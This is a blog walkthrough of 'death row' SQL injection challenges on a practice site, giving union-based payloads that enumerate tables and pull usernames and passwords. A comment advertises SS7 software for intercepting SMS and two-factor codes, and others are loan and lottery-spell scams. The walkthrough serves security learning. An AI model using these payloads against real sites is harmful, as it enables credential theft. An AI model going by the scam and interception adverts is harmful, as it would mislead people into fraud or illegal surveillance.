Sql Ninja Death row SQL injection (http://leettime.net/sqlninja.com)

-
What is death row SQL injection?
normally the table has many rows itself, so if we execute the usual SQL query ("select * from table") we can get all the records from that table. if a website has SQL injection vulnerability attacker also get all records from the database. the clever programmer uses limit keyword to hide unwanted rows from an attacker. let's assume programme use LIMIT 1 in his query attacker can see only 1 row of output at one time. hence it reduces the impact of the attack. so we called hide rows as death row.

death row SQL injection challenges from  http://leettime.net/sqlninja.com

 challenge 1:
if we put a single quote at the end of the URL we will get an error. the below image shows that

when we try to exploit a SQL injection attack, our first step should be fixed the query. if we use this "-- -" at the URL  end, we can fix the query 

then we have to find the respected table's column by using "ORDER BY" command. if you have any issue with SQL injection steps please, check my previous post.

now we have to find out the vulnerable column form respective table.
the above image shows 2nd column says vulnerable.

now we need to find tables from the respective database by using this query "union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()-- -"

now select one of the tables from the database and find columns.
"UNION+SELECT+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=char(117,115,101,114,115)-- -"

after finding the column, we can use this query and get the data from the database.
"UNION+SELECT+1,group_concat(username),3,4,5+from+(select+username+from+users+limit+0,100)a-- -"

group_concat display 1st 1024 character. if we use above method for a huge database, we have to spend more time. so we can use alternative query as well.
union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--

challenge 2:

Vulnerable Parameter – Server Request:
http://leettime.net/sqlninja.com/tasks/deathrow_ch2.php?id=1'

Server Response – Error On Page:
SQL Syntax Error around '))

Possible Pseudo Code:

SELECT * FROM table WHERE (ID=(1))
Why It Works – Server Request:

SELECT * FROM table WHERE (ID=(-1)) union select 1,version()--+-))

challenge 3:

Vulnerable Parameter – Server Request:
http://leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1"

Server Response – Error On Page:
SQL Syntax Error around "1"" limit 1

Possible Pseudo Code:

1
SELECT * FROM table WHERE ID="1" limit 1
Why It Works – Server Request:

1
SELECT * FROM table WHERE ID="-1" union select 1,2,3,version(),5--+-" limit 1

challenge 4:

Vulnerable Parameter – Server Request:
http://leettime.net/sqlninja.com/tasks/deathrow_ch4.php?id=1"

Server Response – Error On Page:
SQL Syntax Error around "1")

Possible Pseudo Code:

1
SELECT * FROM table WHERE ID=("1")
Why It Works – Server Request:

1
SELECT * FROM table WHERE ID=("-1") union select 1,2,3,version(),5,6,7--+-")


Comments

  1. 3June 9, 2019 at 10:42 AM

    please updload solutions for xpath injection

    ReplyDelete
  2. alex morgan November 3, 2019 at 4:22 AM

    SS7 software available to limited number of users

    SMS interception only software $100

    SMS /call Voice recording $350

    2Factor Authentication /location tracking $500

    Read and intercept SMS /phone calls / 2 factor authentications etc

    PS: this software is not be used for criminal activites
    we will not be responsible for any charges you face for involving in illegal activities.

    NO trial version, For educational purposes and for serious buyers only , do not respond to email if you have no intention to purchase

    Eail: fenzy67@gmail.com

    https://bloggerkingindia.blogspot.com/2017/03/hacking-whatsapp-with-ss7-flaw-signal.html

    ReplyDelete
  3. snehaMay 26, 2020 at 11:24 PM


    Your blog is in a convincing manner, thanks for sharing such an information with lots of your effort and time sql server dba online training

    ReplyDelete
  4. UnknownMay 1, 2021 at 11:13 AM

    Are you in need of finance? we give out guarantee cash at 3% interest rate. Contact us on any kind of finance now: financialserviceoffer876@gmail.com whatsapp Number +918929509036 Dr James Eric Finance Pvt Ltd

    ReplyDelete
  5. Ian MartinMarch 16, 2022 at 6:49 PM

    Are you looking for ways to hit the lottery jackpot? Search no more for Dr Amber can help you win the lottery you want with his powerful lottery spell. Visit: amberlottotemple.com or WhatsApp +1 318 306 5044 or email: amberlottotemple@yahoo.com for his spells are real and genuine.

    ReplyDelete

Post a Comment

Popular posts from this blog

Install android studio on the parrot os

-
Image
parrot OS is based on Linux environment so we have to download Linux version of android studio. if you want Linux version android studio just click here . after the download is completed you will get the zip file of the android studio. so you need to unzip it first. then you can see several files within the unzipped folder. figure 1 represents the sample output. Figure 1 then go to bin folder which is stored in the unzipped folder. after opening the bin folder, you can see studio.sh shell script. if you execute that, the android studio will be running on your PC's.  Note:- you have to give execute permission to studio.sh for the current user before you execute studio.sh script. (sudo chmod u+x studio.sh) Figure 2 but we will be doing like this. it's annoying, so now we are going to the terminal command that is helped to us to access android studio by using terminal commands.  move your unzipped file to "/root" from Downloads. then go to "/usr
Read more

How to do simple brute force attack with burp suite

-
Image
What is brute force attack? brute force is a kind of password based attack. normally attacker checks each and every possible combination until reaching the expected output. so an attacker should check the huge amount of data but the normal human cannot do this kind of things. that's why we must move on some predefine tools to do this kind of attacks. work through this is the sample login page. we are going to attack this page and get the login credentials.(note: this is a basic login form it does not have any prevention mechanism for brute force attack.) let's try any value on this form and capture the data packet for analyzing. after analyzed we can say these data packets have username and password, which we entered previously. so we have to forward this data packet to intruder tab (right click and select intruder option). now  go to the intruder and mark the target variables which are carrying username and password. The below figure shows that. Note:
Read more

PoC video of How to Hack Gmail and Bitcoin Wallet using SS7 flaw

-
Image
A long time ago we published a report about how someone can hack WhatsApp with the SS7 by default. The standard SS7 exists for eons now with corrections, but GSM and telecom companies do not bother or trouble to repair their infrastructure against the standard. Now a Cyber ​​Security Company called Positive Technologies has released a video detail as anyone in any Gmail account can hack with a name and a phone number with the standard SS7. After the abduction of the Gmail account of the victim, the investigators then tried to steal a Bitcoin wallet with the same SS7 defect. Positive researchers sent their video to Thomas Fox-Brewster, an investigating reporter for Forbes, as well as details about hacking. What is the SS7 error? The vulnerability is found in the signaling system 7 or SS7, the technology used by telecommunication operators where the high-security message system and telephone calls depend. SS7 is a set of telephone signaling protocols developed in 1975 that make i
Read more